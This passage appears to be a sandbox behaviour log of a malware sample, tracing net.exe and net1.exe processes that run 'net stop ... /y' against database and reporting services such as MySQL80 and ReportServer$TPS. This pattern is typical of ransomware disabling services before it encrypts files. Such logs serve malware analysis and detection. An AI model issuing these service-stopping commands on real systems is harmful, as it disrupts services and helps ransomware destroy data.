LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x583fe8 [0196.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x583fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0196.542] WriteFile (in: hFile=0x26c, lpBuffer=0x583fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0) returned 0 [0196.542] LocalFree (hMem=0x583fe8) returned 0x0 [0196.542] GetFileType (hFile=0x26c) returned 0x3 [0196.542] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586290 [0196.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0196.542] WriteFile (in: hFile=0x26c, lpBuffer=0x586290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfddc, lpOverlapped=0x0) returned 0 [0196.542] LocalFree (hMem=0x586290) returned 0x0 [0196.542] _ultow (in: _Dest=0x889, _Radix=2948620 | out: _Dest=0x889) returned="2185" [0196.542] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x87b338, nSize=0x800, Arguments=0x879dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0196.542] GetFileType (hFile=0x26c) returned 0x3 [0196.542] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x586290 [0196.542] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x586290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0196.542] WriteFile (in: hFile=0x26c, lpBuffer=0x586290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cfde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfde8, lpOverlapped=0x0) returned 0 [0196.542] LocalFree (hMem=0x586290) returned 0x0 [0196.542] GetFileType (hFile=0x26c) returned 0x3 [0196.542] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586290 [0196.543] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0196.543] WriteFile (in: hFile=0x26c, lpBuffer=0x586290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfde8, lpOverlapped=0x0) returned 0 [0196.543] LocalFree (hMem=0x586290) returned 0x0 [0196.543] NetApiBufferFree (Buffer=0x581c60) returned 0x0 [0196.543] NetApiBufferFree (Buffer=0x581c78) returned 0x0 [0196.543] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0196.543] exit (_Code=2) Process: id = "124" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x652fa000" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSOLAP$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 297 os_tid = 0x924 Process: id = "125" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c81b000" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "124" os_parent_pid = "0x128" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 298 os_tid = 0x954 [0196.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff7c | out: lpSystemTimeAsFileTime=0x11ff7c*(dwLowDateTime=0x3e6b80c0, dwHighDateTime=0x1d57a87)) [0196.679] GetCurrentProcessId () returned 0x92c [0196.679] GetCurrentThreadId () returned 0x954 [0196.679] GetTickCount () returned 0x116ad60 [0196.679] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff74 | out: lpPerformanceCount=0x11ff74*=31696410550) returned 1 [0196.680] GetModuleHandleA (lpModuleName=0x0) returned 0xbe0000 [0196.680] __set_app_type (_Type=0x1) [0196.680] __p__fmode () returned 0x74eb31f4 [0196.680] __p__commode () returned 0x74eb31fc [0196.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbeffe6) returned 0x0 [0196.680] __getmainargs (in: _Argc=0xbf9064, _Argv=0xbf906c, _Env=0xbf9068, _DoWildCard=0, _StartInfo=0xbf9024 | out: _Argc=0xbf9064, _Argv=0xbf906c, _Env=0xbf9068) returned 0 [0196.680] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.680] GetConsoleOutputCP () returned 0x1b5 [0196.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbf9080 | out: lpCPInfo=0xbf9080) returned 1 [0196.680] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.683] sprintf_s (in: _DstBuf=0x11ff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0196.683] setlocale (category=0, locale=".437") returned="English_United States.437" [0196.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0196.685] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0196.685] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" [0196.685] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11fd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0196.685] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x76) returned 0x3ff788 [0196.686] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0196.686] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11ff04 | out: Buffer=0x11ff04*=0x401c78) returned 0x0 [0196.686] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11ff04 | out: Buffer=0x11ff04*=0x401c90) returned 0x0 [0196.686] _fileno (_File=0x74eb2900) returned -2 [0196.686] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0196.686] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0196.686] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0196.686] _wcsicmp (_String1="config", _String2="stop") returned -16 [0196.686] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0196.686] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0196.686] _wcsicmp (_String1="file", _String2="stop") returned -13 [0196.686] _wcsicmp (_String1="files", _String2="stop") returned -13 [0196.686] _wcsicmp (_String1="group", _String2="stop") returned -12 [0196.686] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0196.686] _wcsicmp (_String1="help", _String2="stop") returned -11 [0196.686] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0196.686] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0196.686] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0196.686] _wcsicmp (_String1="session", _String2="stop") returned -15 [0196.686] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0196.686] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0196.686] _wcsicmp (_String1="share", _String2="stop") returned -12 [0196.686] _wcsicmp (_String1="start", _String2="stop") returned -14 [0196.686] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0196.686] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0196.686] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0196.687] _wcsicmp (_String1="accounts", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0196.687] _wcsicmp (_String1="computer", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0196.687] _wcsicmp (_String1="config", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0196.687] _wcsicmp (_String1="continue", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0196.687] _wcsicmp (_String1="cont", _String2="MSOLAP$SYSTEM_BGC") returned -10 [0196.687] _wcsicmp (_String1="file", _String2="MSOLAP$SYSTEM_BGC") returned -7 [0196.687] _wcsicmp (_String1="files", _String2="MSOLAP$SYSTEM_BGC") returned -7 [0196.687] _wcsicmp (_String1="group", _String2="MSOLAP$SYSTEM_BGC") returned -6 [0196.687] _wcsicmp (_String1="groups", _String2="MSOLAP$SYSTEM_BGC") returned -6 [0196.687] _wcsicmp (_String1="help", _String2="MSOLAP$SYSTEM_BGC") returned -5 [0196.687] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$SYSTEM_BGC") returned -5 [0196.687] _wcsicmp (_String1="localgroup", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0196.687] _wcsicmp (_String1="pause", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0196.687] _wcsicmp (_String1="session", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="sessions", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="sess", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="share", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="start", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="stats", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="statistics", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="stop", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.687] _wcsicmp (_String1="time", _String2="MSOLAP$SYSTEM_BGC") returned 7 [0196.687] _wcsicmp (_String1="user", _String2="MSOLAP$SYSTEM_BGC") returned 8 [0196.688] _wcsicmp (_String1="users", _String2="MSOLAP$SYSTEM_BGC") returned 8 [0196.688] _wcsicmp (_String1="msg", _String2="MSOLAP$SYSTEM_BGC") returned -8 [0196.688] _wcsicmp (_String1="messenger", _String2="MSOLAP$SYSTEM_BGC") returned -14 [0196.688] _wcsicmp (_String1="receiver", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.688] _wcsicmp (_String1="rcv", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.688] _wcsicmp (_String1="netpopup", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0196.688] _wcsicmp (_String1="redirector", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.688] _wcsicmp (_String1="redir", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.688] _wcsicmp (_String1="rdr", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.688] _wcsicmp (_String1="workstation", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.688] _wcsicmp (_String1="work", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.688] _wcsicmp (_String1="wksta", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.688] _wcsicmp (_String1="prdr", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0196.688] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SYSTEM_BGC") returned -9 [0196.688] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0196.688] _wcsicmp (_String1="server", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.688] _wcsicmp (_String1="svr", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.688] _wcsicmp (_String1="srv", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.688] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0196.688] _wcsicmp (_String1="alerter", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0196.688] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0196.688] _wcsupr (in: _String="MSOLAP$SYSTEM_BGC" | out: _String="MSOLAP$SYSTEM_BGC") returned="MSOLAP$SYSTEM_BGC" [0196.688] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x405460 [0196.691] GetServiceKeyNameW (in: hSCManager=0x405460, lpDisplayName="MSOLAP$SYSTEM_BGC", lpServiceName=0xbfaaf0, lpcchBuffer=0x11fea0 | out: lpServiceName="", lpcchBuffer=0x11fea0) returned 0 [0196.691] _wcsicmp (_String1="msg", _String2="MSOLAP$SYSTEM_BGC") returned -8 [0196.691] _wcsicmp (_String1="messenger", _String2="MSOLAP$SYSTEM_BGC") returned -14 [0196.691] _wcsicmp (_String1="receiver", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.691] _wcsicmp (_String1="rcv", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.691] _wcsicmp (_String1="redirector", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.691] _wcsicmp (_String1="redir", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.691] _wcsicmp (_String1="rdr", _String2="MSOLAP$SYSTEM_BGC") returned 5 [0196.691] _wcsicmp (_String1="workstation", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.691] _wcsicmp (_String1="work", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.691] _wcsicmp (_String1="wksta", _String2="MSOLAP$SYSTEM_BGC") returned 10 [0196.691] _wcsicmp (_String1="prdr", _String2="MSOLAP$SYSTEM_BGC") returned 3 [0196.691] _wcsicmp (_String1="devrdr", _String2="MSOLAP$SYSTEM_BGC") returned -9 [0196.692] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0196.692] _wcsicmp (_String1="server", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.692] _wcsicmp (_String1="svr", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.692] _wcsicmp (_String1="srv", _String2="MSOLAP$SYSTEM_BGC") returned 6 [0196.692] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$SYSTEM_BGC") returned -1 [0196.692] _wcsicmp (_String1="alerter", _String2="MSOLAP$SYSTEM_BGC") returned -12 [0196.692] _wcsicmp (_String1="netlogon", _String2="MSOLAP$SYSTEM_BGC") returned 1 [0196.692] NetServiceControl (in: servername=0x0, service="MSOLAP$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x11fe9c | out: bufptr=0x11fe9c) returned 0x889 [0196.693] wcscpy_s (in: _Destination=0xbfa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0196.693] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0196.693] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xbfb338, nSize=0x800, Arguments=0xbf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0196.694] GetFileType (hFile=0x26c) returned 0x3 [0196.694] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x403f90 [0196.694] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x403f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0196.694] WriteFile (in: hFile=0x26c, lpBuffer=0x403f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x11fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fddc, lpOverlapped=0x0) returned 0 [0196.695] LocalFree (hMem=0x403f90) returned 0x0 [0196.695] GetFileType (hFile=0x26c) returned 0x3 [0196.695] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406238 [0196.695] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0196.695] WriteFile (in: hFile=0x26c, lpBuffer=0x406238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fddc, lpOverlapped=0x0) returned 0 [0196.695] LocalFree (hMem=0x406238) returned 0x0 [0196.695] _ultow (in: _Dest=0x889, _Radix=1179148 | out: _Dest=0x889) returned="2185" [0196.695] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xbfb338, nSize=0x800, Arguments=0xbf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0196.695] GetFileType (hFile=0x26c) returned 0x3 [0196.695] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x406238 [0196.695] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x406238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0196.695] WriteFile (in: hFile=0x26c, lpBuffer=0x406238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x11fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fde8, lpOverlapped=0x0) returned 0 [0196.695] LocalFree (hMem=0x406238) returned 0x0 [0196.695] GetFileType (hFile=0x26c) returned 0x3 [0196.695] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x406238 [0196.695] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x406238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n@", lpUsedDefaultChar=0x0) returned 2 [0196.695] WriteFile (in: hFile=0x26c, lpBuffer=0x406238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x11fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x11fde8, lpOverlapped=0x0) returned 0 [0196.695] LocalFree (hMem=0x406238) returned 0x0 [0196.696] NetApiBufferFree (Buffer=0x401c78) returned 0x0 [0196.696] NetApiBufferFree (Buffer=0x401c90) returned 0x0 [0196.696] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$SYSTEM_BGC /y" [0196.696] exit (_Code=2) Process: id = "126" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x144ff000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 299 os_tid = 0x920 Process: id = "127" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fb54000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "126" os_parent_pid = "0x91c" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 300 os_tid = 0x960 [0196.822] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fc48 | out: lpSystemTimeAsFileTime=0x36fc48*(dwLowDateTime=0x3e80ed20, dwHighDateTime=0x1d57a87)) [0196.822] GetCurrentProcessId () returned 0x928 [0196.822] GetCurrentThreadId () returned 0x960 [0196.822] GetTickCount () returned 0x116adec [0196.822] QueryPerformanceCounter (in: lpPerformanceCount=0x36fc40 | out: lpPerformanceCount=0x36fc40*=31710680789) returned 1 [0196.822] GetModuleHandleA (lpModuleName=0x0) returned 0xc70000 [0196.822] __set_app_type (_Type=0x1) [0196.822] __p__fmode () returned 0x74eb31f4 [0196.823] __p__commode () returned 0x74eb31fc [0196.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc7ffe6) returned 0x0 [0196.823] __getmainargs (in: _Argc=0xc89064, _Argv=0xc8906c, _Env=0xc89068, _DoWildCard=0, _StartInfo=0xc89024 | out: _Argc=0xc89064, _Argv=0xc8906c, _Env=0xc89068) returned 0 [0196.823] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.823] GetConsoleOutputCP () returned 0x1b5 [0196.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xc89080 | out: lpCPInfo=0xc89080) returned 1 [0196.823] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.826] sprintf_s (in: _DstBuf=0x36fc00, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0196.826] setlocale (category=0, locale=".437") returned="English_United States.437" [0196.828] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0196.828] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0196.828] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$TPS /y" [0196.828] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f9cc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0196.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x74) returned 0x77f788 [0196.829] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0196.829] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fbd0 | out: Buffer=0x36fbd0*=0x781c78) returned 0x0 [0196.829] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fbd0 | out: Buffer=0x36fbd0*=0x781c90) returned 0x0 [0196.829] _fileno (_File=0x74eb2900) returned -2 [0196.829] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0196.829] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0196.829] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0196.829] _wcsicmp (_String1="config", _String2="stop") returned -16 [0196.829] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0196.829] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0196.829] _wcsicmp (_String1="file", _String2="stop") returned -13 [0196.829] _wcsicmp (_String1="files", _String2="stop") returned -13 [0196.829] _wcsicmp (_String1="group", _String2="stop") returned -12 [0196.829] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0196.829] _wcsicmp (_String1="help", _String2="stop") returned -11 [0196.829] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0196.829] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0196.829] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0196.829] _wcsicmp (_String1="session", _String2="stop") returned -15 [0196.829] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0196.829] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0196.829] _wcsicmp (_String1="share", _String2="stop") returned -12 [0196.829] _wcsicmp (_String1="start", _String2="stop") returned -14 [0196.829] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0196.829] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0196.830] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0196.830] _wcsicmp (_String1="accounts", _String2="ReportServer$TPS") returned -17 [0196.830] _wcsicmp (_String1="computer", _String2="ReportServer$TPS") returned -15 [0196.830] _wcsicmp (_String1="config", _String2="ReportServer$TPS") returned -15 [0196.830] _wcsicmp (_String1="continue", _String2="ReportServer$TPS") returned -15 [0196.830] _wcsicmp (_String1="cont", _String2="ReportServer$TPS") returned -15 [0196.830] _wcsicmp (_String1="file", _String2="ReportServer$TPS") returned -12 [0196.830] _wcsicmp (_String1="files", _String2="ReportServer$TPS") returned -12 [0196.830] _wcsicmp (_String1="group", _String2="ReportServer$TPS") returned -11 [0196.830] _wcsicmp (_String1="groups", _String2="ReportServer$TPS") returned -11 [0196.830] _wcsicmp (_String1="help", _String2="ReportServer$TPS") returned -10 [0196.830] _wcsicmp (_String1="helpmsg", _String2="ReportServer$TPS") returned -10 [0196.830] _wcsicmp (_String1="localgroup", _String2="ReportServer$TPS") returned -6 [0196.830] _wcsicmp (_String1="pause", _String2="ReportServer$TPS") returned -2 [0196.830] _wcsicmp (_String1="session", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="sessions", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="sess", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="share", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="start", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="stats", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="statistics", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="stop", _String2="ReportServer$TPS") returned 1 [0196.830] _wcsicmp (_String1="time", _String2="ReportServer$TPS") returned 2 [0196.830] _wcsicmp (_String1="user", _String2="ReportServer$TPS") returned 3 [0196.830] _wcsicmp (_String1="users", _String2="ReportServer$TPS") returned 3 [0196.830] _wcsicmp (_String1="msg", _String2="ReportServer$TPS") returned -5 [0196.830] _wcsicmp (_String1="messenger", _String2="ReportServer$TPS") returned -5 [0196.830] _wcsicmp (_String1="receiver", _String2="ReportServer$TPS") returned -13 [0196.830] _wcsicmp (_String1="rcv", _String2="ReportServer$TPS") returned -2 [0196.830] _wcsicmp (_String1="netpopup", _String2="ReportServer$TPS") returned -4 [0196.830] _wcsicmp (_String1="redirector", _String2="ReportServer$TPS") returned -12 [0196.830] _wcsicmp (_String1="redir", _String2="ReportServer$TPS") returned -12 [0196.830] _wcsicmp (_String1="rdr", _String2="ReportServer$TPS") returned -1 [0196.830] _wcsicmp (_String1="workstation", _String2="ReportServer$TPS") returned 5 [0196.830] _wcsicmp (_String1="work", _String2="ReportServer$TPS") returned 5 [0196.830] _wcsicmp (_String1="wksta", _String2="ReportServer$TPS") returned 5 [0196.830] _wcsicmp (_String1="prdr", _String2="ReportServer$TPS") returned -2 [0196.830] _wcsicmp (_String1="devrdr", _String2="ReportServer$TPS") returned 